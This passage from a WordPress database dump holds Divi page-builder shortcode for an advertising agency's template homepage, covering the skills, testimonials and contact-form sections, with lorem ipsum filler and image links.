button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:59:36','2020-07-06 20:59:36','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(258,1,'2020-07-06 21:00:53','2020-07-06 21:00:53','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" 